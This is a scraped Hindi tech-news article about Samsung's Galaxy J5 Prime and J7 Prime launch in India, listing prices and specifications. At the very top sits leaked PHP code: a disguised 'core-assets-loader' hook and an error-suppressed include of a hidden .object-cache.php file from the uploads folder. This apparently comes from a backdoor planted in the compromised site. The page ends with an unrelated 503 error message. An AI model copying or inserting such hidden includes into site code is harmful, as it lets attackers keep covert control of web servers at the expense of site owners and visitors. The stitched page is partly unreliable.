add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सैमसंग ने लॉन्च किया दो बेहद बजट स्मार्टफोन J5 प्राइम और J7 प्राइम – SOCH INDIA
Menu

टेक्नोलॉजी
सैमसंग ने लॉन्च किया दो बेहद बजट स्मार्टफोन J5 प्राइम और J7 प्राइम

nobanner

सैमसंग ने लॉन्च किया दो बेहद बजट स्मार्टफोन J5 प्राइम और J7 प्राइम

दक्षिण कोरिया की दिग्गज इलेक्ट्रॉनिक कंपनी सैमसंग ने सोमवार को भारतीय बाजार में दो नए स्मार्टफोन गैलेक्सी J5 प्राइम और गैलेक्सी J7 प्राइम लॉन्च किए. ये स्मार्टफोन भारत मे ही बने s सिक्योर और A पॉवर प्लानिंग तकनीक से लैस हैं. इससे डिवाइस को ज्यादा सेक्योरिटी और ज्यादा बैटरी पॉवर के साथ कई अन्य फीचर्स मिलते हैं.

गैलेक्सी J5 प्राइम की कीमत 14,790 रुपये और गैलेक्सी J7 प्राइम की कीमत 18,790 रुपये है.

j5

गैलेक्सी J7 प्राइम में 5.5 इंच फुल एचडी डिस्प्ले 2.5डी गोरिल्ला ग्लास है. वहीं, इसमें 1.6GHz ऑक्टाकोर Exynos 7870 प्रोसेसर के साथ 3 जीबी रैम और 16 जीबी ऑनबोर्ड मेमोरी दी गई है, जिसे मेमोरी कार्ड के जरिए 256 जीबी तक बढ़ाया जा सकता है. इसमें 3,300mAh की बैटरी लगी है और इसमें 13 मेगापिक्सल का रियर कैमरा और 8 मेगापिक्सल का सेल्फी कैमरा है.

लॉन्च हुए दूसरे स्मार्टफोन गैलेक्सी J5 प्राइम में 5 इंच एचडी डिस्प्ले, क्वार्डकोर प्रोसेसर, 2 जीबी रैम, 16 जीबी ऑनबोर्ड मेमोरी (256 जीबी तक बढ़ाया जा सकता है), 2400mAh बैटरी दी गई है.

फोटोग्राफी फ्रंट की बात करें तो इसमें 13 मेगापिक्सल का रियर और 8 मेगापिक्सल फ्रंट फेसिंग कैमरा है. बाजार में ये स्मार्टफोन दो काले और गोल्ड कलर वैरिएंट में उपलब्ध हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.